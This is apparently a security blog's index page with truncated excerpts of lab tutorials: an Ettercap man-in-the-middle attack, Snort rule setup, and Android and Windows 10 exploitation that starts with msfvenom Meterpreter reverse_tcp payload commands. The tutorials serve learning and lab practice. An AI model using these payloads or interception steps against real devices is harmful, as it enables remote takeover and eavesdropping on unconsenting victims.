Posts

Performing Man-in-the-middle(MITM) attack using Ettercap and analyzing the packet using Wireshark

Image
  First, we have to connect Kali-Linux in the same network in which victim was connected. Note :- "we have to connect kali with the same network of victim."      Step-1 :-  Start Ettercap (GUI version) on Kali-Linux as shown below. Step-2 : -   Turn on " Sniffing at startup " option, And select your interface from below                      option.    Then Click on start as shown below.    Wait until the message " started unified sniffing " you get as shown below.    Make sure that your victim is in the network, to check that we have to scan the whole    network. (Follow the below screenshots)   Note :- "if it is doesn't showing anything then click on "scan for hosts" as shown below."      All connected devices of your network will be displayed as show...

Configuring SNORT on Network Using Kali Linux

Image
 What is SNORT?   --> Snort is the foremost Open Source Intrusion Prevention System (IPS) in the world. Snort IPS uses a series of rules that help define malicious network activity and uses those rules to find packets that match against them and generates alerts for users.   How it is shown in this blog ?   --> Here we will configure SNORT our local Home network.           Here in this blog I will show you how you can get alerts in kali terminal if some user on your local home network(Wifi) is using Instagram, Facebook and Youtube. We will configure some set of custom rules for this three websites. SNORT itself comes with some sort of Pre-defined rules for Securing our network from Scanning and exploiting.   Reuirements :- 1. Kali Linux (which is connected to the your network which you want to monitor) 2.Router    I have Installed Kali Linux on Virtual box.   So lets Start ----------->   Step 1:- Download and...

Exploiting Android using Kali Linux

Image
  Hello everyone, this blog is related to exploiting Android system using Kali Linux. So, basically we need two operating systems, First one is kali(attacker) and second one is Android(victim). This Practical works when both of the machines are in same network. So. I have installed Kali-linux in Virtualbox and I am using Genymotion for Android. And I have managed to put the both machines on same network, you have to do same if you are also trying to do same as me. Otherwise Important is both the machines has to be on same network, This also works if you have host machine kali and on other side you have Android Device with you. You can also install kali on Virtualbox and set it to NAT network. For surety u can ping the Android Device machine from Kali to check that the machines are on same network or not. Practical Starts Here ------> 1. go to kali terminal and type the following command.  type your kali ip instead of 170.9.210.105 msfvenom –p android/meterpreter/reverse_tcp...

Exploiting Windows 10 using Kali Linux

Image
 Hello everyone, this blog is related to exploiting windows system(win-10) using Kali Linux. So, basically we need two operating systems, First one is kali(attacker) and second one is Windows(victim). This Practical works when both of the machines are in same network. So. I have installed Kali-linux and windows-10 in Virtualbox. And I have managed to put the both machines on same network, you have to do same if you are also trying to do same as me. Otherwise Important is both the machines has to be on same network, This also works if you have host machine kali and on other side you have windows-10(PC) with you. You can also install kali on Virtualbox and set it to NAT network(Bridge is recommended). For surety u can ping the windows 10 machine from Kali to check that the machines are on same network or not. Practical Starts Here -------> 1. go to kali terminal and type the following command.  type your kali ip instead of 10.0.2.4 msfvenom -p windows/x64/meterpreter/reverse_...